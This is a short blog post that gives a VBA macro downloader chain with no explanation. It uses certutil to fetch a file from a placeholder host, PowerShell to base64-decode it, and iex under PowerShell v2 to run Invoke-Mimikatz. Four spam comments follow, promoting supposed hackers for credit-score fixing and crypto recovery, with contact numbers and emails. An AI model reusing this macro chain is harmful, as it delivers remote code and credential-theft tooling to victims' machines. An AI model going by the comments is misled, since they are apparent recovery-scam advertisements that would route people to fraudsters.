Thursday, January 13, 2022

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")



4 comments:

  1. I was depressed some Months ago due to how frustrating it is dealing with bad credits, but reaching out to HACK VANISH via Phone: +1 (747) 293-8514 and Email: HACK VANISH (@) GMAIL. COM gave my life a new meaning, after I found him credible through positive reviews I read on a credit blog, in a twinkle of an eye, this great hacker got my credit score restored from 509 to 784 across the 3 major credit bureaus, all evictions and repossession has been wiped off, my LexisNexis and Chex system fixed respectively, to my greatest surprise, some days later, I received an E-mail confirming the approval of my pending loan application. I can confidently say 2021 was an exceptional year for my husband and I as we are proud owners of a new home and a brand-new SUV courtesy HACK VANISH, I would definitely recommend him to anyone in need of a genuine Hacker.

    ReplyDelete
  2. Fast cash offer for you today at just 3% interest rate, both long and short term cash of all amounts and currencies, no collateral required. Apply now for your instant approval financialserviceoffer876@gmail.com WhatsApp +918929509036

    ReplyDelete
  3. After having to endure a lot just to recover my lost BTC despite numerous people telling me it was hopeless, I am sending this review today in an effort to help everyone out. You are not the only one who has lost Bitcoin due to investing with wrong binary options, trading platforms, account hacks, or other Bitcoin-related frauds. As a victim of a scam, I suffered a loss of $87,000. I tried several methods to recover my money, all to no avail, until I found Asset Hacker Recovering, a cybercrime investigator and expert recovery company. As a result of being able to explain my troubles to Asset Hacker Recovery, everything I lost to these fictitious investors was recovered within days. Send them a message below and get the assistance you need. email; Assetcryptohacker@proton.me
    Whatsapp: +393510777769

    ReplyDelete
  4. My crypto wallet was compromised when I lost my secret phrase.
    Hackers got a hold of my crypto wallet after I lost the seed phrase to my crypto wallet which I had saved to my email.
    I had to go through all possible options to get it figured out but I couldn’t, the support system of Coinbase couldn’t help even when I had secured my account with the special seed phrase for extra security, and that was how I lost access to $2m worth of crypto coins.
    This was my life savings and investment from my business partners which I had secured in my crypto wallet. Fortunately, I happen to stumble upon a post about MorphoHack Cyber Service, a crypto wallet and funds recovery company. I contacted this team and told them about the whole situation, while I was a bit reluctant about trusting them with my information, it happened there was nothing I couldn’t do to get my funds back so I went with everything they asked, and to my greatest satisfaction, MorphoHack cyber-service was able to give me access to my crypto wallet including securing my crypto wallet from future attempts. I’m in shock and short of words but if you wish to get a hold of them, you can find their contact details below. 
    MAIL:MorphoHack@CyberServices.com
    WHATS APP:+1 213  672- 4092  
    WEB:MORPHOHACK.WIXSITE. COM/ CYBER

    ReplyDelete